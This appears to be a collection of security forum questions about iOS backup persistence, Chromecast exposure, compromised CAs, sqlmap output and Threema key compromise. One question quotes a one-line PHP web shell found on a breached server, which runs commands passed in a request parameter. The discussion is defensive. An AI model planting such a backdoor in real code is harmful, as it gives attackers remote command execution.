Can an iOS backup be compromised?

I originally posted this on the Apple Stack Exchange but it was suggested that it was off topic, so I’m posting it here in hopes that this is a more relevant place for it.

Say that an iOS device has been compromised by some vulnerability. If one were to backup their device to their computer (or iCloud, but it’s my understanding that making an encrypted backup to a computer allows for more to be stored in the backup, such as passwords) and then restore the OS using the backup to restore settings, could the backup re-compromise the device?

Secondly, have there been any documented cases of persistent threats (outside of jailbreaks) that are remotely exploitable and can persist after a restore?

Does a Chromecast could be compromised from its default open network?

I left my apartment for few days, so I disconnected my wireless router but I forgot to disconnect my Chromecast as well. I remember that when a Chromecast can’t find the network it was connected anymore, it creates an open network that can be used to reconnect to another wireless network.

The issue is that I’m away from my apartment for a few days and my Chromecast is probably currently broadcasting an open network that anyone can connect to.

Even if there is no internet connexion on that open network, there are two things I’m worried about.

  1. The Chromecast could be attacked from a wireless exploit. We don’t know how someone else’s computer could be infected by malware, the Chromecast could be attacked once that infected computer connects to it (for example, by running wireless exploits against). Even, the worst scenario could be an attacker just connecting to that Chromecast open network and directly run exploits against it.

  2. It might be possible for someone who can attack the Chromecast to get the wireless network password that the Chromecast was previously connected to. This password might be obviously stored somewhere on the Chromecast memory and with some access to the filesystem by a kind of jailbreak (for example, the point 1), it could be retrieved and used to connect to my wireless network.

Considering those two points, should I factory reset my Chromecast once I’m back to my apartment ? Or even safer, should I get rid of this Chromecast considering that the firmware could have been compromised and buy a new one ?

How do I identify, characterize and detect if trusted CAs compromised?

What is the best approach to use in identifying, characterizing and detecting compromised CAs? I do not mean an invalid certificate or invalid CA that can be identified by an X.509 during validation process. I am looking for a tool/approach that can identify and detect “trusted CA that is actually compromised. For example the cause of compromisation like attacker Impersonate or compromise CA key and try to issue fraudulent certificate/ fake CRL.

A part from existing methods such as CT, key pinning, DANE etc which partly address some issues related to CA compromised.

I there a way from method like Blockchain, Machine learning or any role based approach can be used to first identify, characterize and detect if trusted CA really compromised?

Server was compromised, found this line in a recently modified PHP file [closed]

I found this at the top of a PHP file in the web server:

<?php if(isset($ _REQUEST['xxx'])){ echo "<pre>"; $ xxx = ($ _REQUEST['xxx']); system($ xxx); echo "</pre>"; die; }?>

I’m guessing this is how they got the server to execute whatever commands they wanted to get in.

Does anyone know how this might have slipped into the PHP file in the first place? I know it’s an extremely vague and stupid question, but I’m stumped. Did they likely already have access to the server and slipped this in as a backdoor for later?

SQLMap: How to create a .sqlite local copy of the compromised database?

I’ve been playing around with sqlmap and I’ve notice that it creates a hidden folder named:

/%mycomputer%/.sqlmap/output 

where inside, it also creates a folder for every sql injection test:

www.example.1 www.example.2 

My question is the following: Can I store the whole database in the file “session.sqlite” ? If so, how? what is the command to place all the info gathered in the “session”

Threema: Are received messages exposed, when sender’s private key gets compromised?

Note: This question is specific to the Threema Messenger, and relates to their implementation of encryption (using the NaCl ECDH implementation as per their docs).

I refer specifically to their “note on outgoing messages” in their validation document on their website:

It may seem strange that outgoing messages can be decrypted by entering the sender’s private key and the recipient’s public key, i.e. without knowing the recipient’s private key. …

Now, consider this scenario:

  • Alice has received a message from Bob, while Eve records/intercepts traffic as person-in-the-middle on the way to Alice.
  • Alice’s public key of course is public, but Alice never disclosed the private key.
  • Eve somehow gets the private key of Bob.

With Bob’s key and the traffic, could Eve now decrypt all content Bob has ever sent to Alice?

In other words, with Threema, is the privacy of received content dependent on the safety of the private key of the SENDER?